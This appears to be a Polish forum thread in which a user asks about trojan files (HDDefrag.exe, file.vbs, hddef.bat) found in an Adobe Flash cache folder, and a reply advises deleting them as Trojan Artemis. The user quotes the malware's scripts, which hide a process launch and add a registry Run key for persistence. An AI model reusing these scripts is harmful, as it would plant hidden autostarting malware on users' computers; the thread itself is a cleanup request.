Wirus w Adobe\Flash Player\File Cache\HDDefrag.exe

Mam otóż taki problem z wirusem w folderze Użytkownicy\ja\AppData\Roaming\ Adobe\Flash Player\File Cache\HDDefrag.exe, avast wykrywa plik HDDefrag.exe jako wirus, a program SUPERAntiSpyware Professional nic nie wykrywa, i za każdym razem avast woła o skanowanie dysku bo tam siedzi, i zeskanowałem dysk i znalazł jeszcze 5 wirusów.

Usunąłem je i teraz jak włączam system to mam to okno:

00138076001538755000_thumb.jpg

A w tym folderze sa jeszcze pliki:

file.vbs

hddef.bat

libcurl.dll

pthreadGC2.dll

Edytowałem zawartości pliku file.vbs w nim jest to:CreateObject(“Wscript.Shell”).Run “”"" WScript.Arguments(0) “”"", 0, False

A natomiast w pliku hddef.bat:

@echo off

%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v HDDefrag /d “wscript “%appdata%\Adobe\Flash Player\File Cache\file.vbs” “%appdata%\Adobe\Flash Player\File Cache\hddef.bat”” /f

start /b /normal “a” “%appdata%\Adobe\Flash Player\File Cache\HDDefrag.exe”

Wszedłem w rejestr i usunąłem klucz HKCU\software\microsoft\windows\currentversion\run /v HDDefrag

I teraz wszystko się włącza normalnie, i moje pytanie jest dotyczące tych czterech plików file.vbs, hddef.bat, libcurl.dll, pthreadGC2.dll czy mam je wkleić je z powrotem tam do tej ścieżki Użytkownicy\ja\AppData\Roaming\ Adobe\Flash Player\File Cache\ :?: czy mam je skasować :?: bo aktualnie ich tam nie mam (są na pulpicie).

Jeżeli ktoś coś będzie wiedział proszę o odpowiedz.

Kasuj bo to są pliki trojana Artemis.

Pozdrawiam!

Ok już wywalone.

Dzięki.